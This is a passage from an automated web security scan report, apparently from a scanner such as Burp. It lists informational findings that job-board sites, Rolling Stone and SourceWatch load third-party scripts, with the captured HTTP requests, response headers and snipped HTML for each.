                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.410. http://www.recruitingcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.recruitingcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.recruitingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:23 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=rtub18ulrc3vam4sd88gmoelh0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:24 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:24 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:24 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:24 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:24 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:24 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:24 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:24 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 105534

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.411. http://www.researchingcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.researchingcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.researchingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:42 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=14bsqa9jfj35kburppunl56pe1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:43 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:43 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:43 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:43 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:43 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:43 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:43 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:43 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 112960

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.412. http://www.retailcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.retailcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.retailcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:38:47 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=0f8bbnd9tsuoh4h0j5d47on745; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:38:47 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 105722

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.413. http://www.rollingstone.com/music/albumreviews/low-country-blues-20110114

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rollingstone.com
Path:   /music/albumreviews/low-country-blues-20110114

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /music/albumreviews/low-country-blues-20110114 HTTP/1.1
Host: www.rollingstone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.3.3
Content-Type: text/html; charset=utf-8
Server: Apache (Unix;)
Cache-Control: private, max-age=5507
Date: Sat, 22 Jan 2011 01:25:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37679

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
   
...[SNIP]...
</script>
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1" type="text/javascript"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js">
</script>
...[SNIP]...
</script>
<script src="http://edge.quantserve.com/quant.js" type="text/javascript"></script>
...[SNIP]...
<!-- End comScore Tag -->

<script type="text/javascript" src="http://content.dl-rms.com/rms/mother/13402/nodetag.js"></script>

<!-- general site-wide iCompass script -->
<script language="javascript" src="http://icompass.insightexpressai.com/124.js"></script>
...[SNIP]...

15.414. http://www.sciencescrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sciencescrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.sciencescrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:01 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=16dk0s9ru5o61n37p22c60grs4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:01 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:01 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:01 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:01 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:01 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:01 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:01 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:01 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 139820

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...
<!-- Start Quantcast tag -->
       <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

15.415. http://www.scientistcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scientistcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.scientistcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:44 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=rkh4pgjirjhh2qdflm011inei3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:44 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:44 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:44 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:44 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:44 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:44 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:44 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:44 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 107194

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.416. http://www.sellingcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sellingcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.sellingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:27 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=u9aug9qog02rlvafs62g9l9651; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:27 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:27 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:27 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:27 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:27 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:27 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:27 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:27 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 130266

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...
<!-- Start Quantcast tag -->
       <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

15.417. http://www.sourcewatch.org/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sourcewatch.org
Path:   /index.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /index.php?title=Vinson_%26_Elkins_LLP HTTP/1.1
Host: www.sourcewatch.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:45:29 GMT
Server: Apache/2.2.17
Content-language: en
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=swatch_sw1151Token;string-contains=swatch_sw1151LoggedOut;string-contains=swatch_sw1151_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-Modified: Thu, 23 Dec 2010 14:09:30 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26316

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</script>
   <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<!-- Served in 0.044 secs. --><script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

15.418. http://www.sqlcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sqlcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.sqlcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:12 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ic5cgni73m80fllgi2jl24kau2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:12 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:12 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:12 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:12 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:12 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:12 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:12 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:12 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109037

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.419. http://www.teenagercrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.teenagercrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.teenagercrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:56 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=240j3fr7u4qsmuqu986njli7d2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:56 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:56 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:56 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:56 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:56 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:56 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:56 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:56 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 99711

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.420. http://www.telecomcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.telecomcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.telecomcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:55 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=fn27b7rlsvo4speggt7vmuaia6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:56 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:56 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:56 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:56 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:56 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:56 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:56 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:56 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111736

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
